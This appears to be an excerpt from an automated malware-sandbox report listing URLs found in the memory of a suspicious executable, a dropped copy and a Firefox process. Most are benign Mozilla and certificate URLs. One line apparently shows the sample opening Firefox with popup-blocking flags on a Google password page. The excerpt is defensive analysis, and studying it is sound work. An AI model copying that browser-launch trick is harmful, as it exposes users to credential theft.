Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001A.00000003.3165170400.0000019E4E0ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlSEC_REQUIRE_SAME_ORIGIN_DATA_IS_BLOCKEDACTIVITY_SUBTYP
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001A.00000002.3227788063.0000019E47026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001A.00000002.3227788063.0000019E47026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001A.00000002.3227788063.0000019E47026000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: http://fb.me/use-check-prop-types
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: http://fb.me/use-check-prop-typesG
Source: firefox.exe, 0000001A.00000003.3092408518.0000019E4CA56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3169464737.0000019E4DEB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3135984680.0000019E53E83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3274206743.0000019E4CA4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3169464737.0000019E4DE7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3257880743.0000019E4BF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3145273274.0000019E53D93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3288686751.0000019E4DE4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3093671509.0000019E49EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3165170400.0000019E4E025000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3245252425.0000019E49ECF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3119455546.0000019E557B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3250265468.0000019E4B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3200289786.0000019E53E84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3092945817.0000019E4BDF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3142796839.0000019E53E85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3254465653.0000019E4BCA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3092945817.0000019E4BDF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3255417100.0000019E4BDB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001A.00000003.3148359277.0000019E53BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001A.00000003.3148359277.0000019E53BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: http://stackoverflow.com/questions/30030031)
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateONLY_INSTANCE_CHECK_DEFAULT_POLL_INTERVAL_MSBITS_IDLE_NO_PROGR
Source: firefox.exe, 0000001A.00000002.3257146200.0000019E4BE6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3257146200.0000019E4BE19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3286844037.0000019E4DCE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3227788063.0000019E47051000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul(
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulExpected
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulR
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xuloncommand=closebuttoncommand
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulopenPreferences/internalPrefCategoryNam
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Sessio
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3148359277.0000019E53BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2197608376.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2924958983.0000000005A4D000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3087303221.0000000006013000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3269450087.0000019E4C366000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3148359277.0000019E53BC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001A.00000003.3086228555.0000019E4B852000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001A.00000002.3214593137.00000045EEBD8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3276626657.0000019E4CD44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001A.00000002.3223563743.0000019E3B669000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-users/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C00E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C055000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B811000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://baidu.com
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://basket.mozilla.org/news/subscribe/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://basket.mozilla.org/news/subscribe_sms/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://basket.mozilla.org/subscribe.json
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000003.2199007383.0000000005BDA000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3090013500.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2214880868.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA59000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3247984693.0000019E4B65C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180toolbar-context-menu-bookmarks-show-other-bookma
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2174370045.0000000005C1B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896261286.0000000005958000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2896136861.000000000596F000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051709799.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3056682924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3051343446.000000000601D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001A.00000002.3230691472.0000019E47D8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000003.2199007383.0000000005BDA000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3090013500.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2214880868.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001A.00000002.3269450087.0000019E4C376000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B811000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
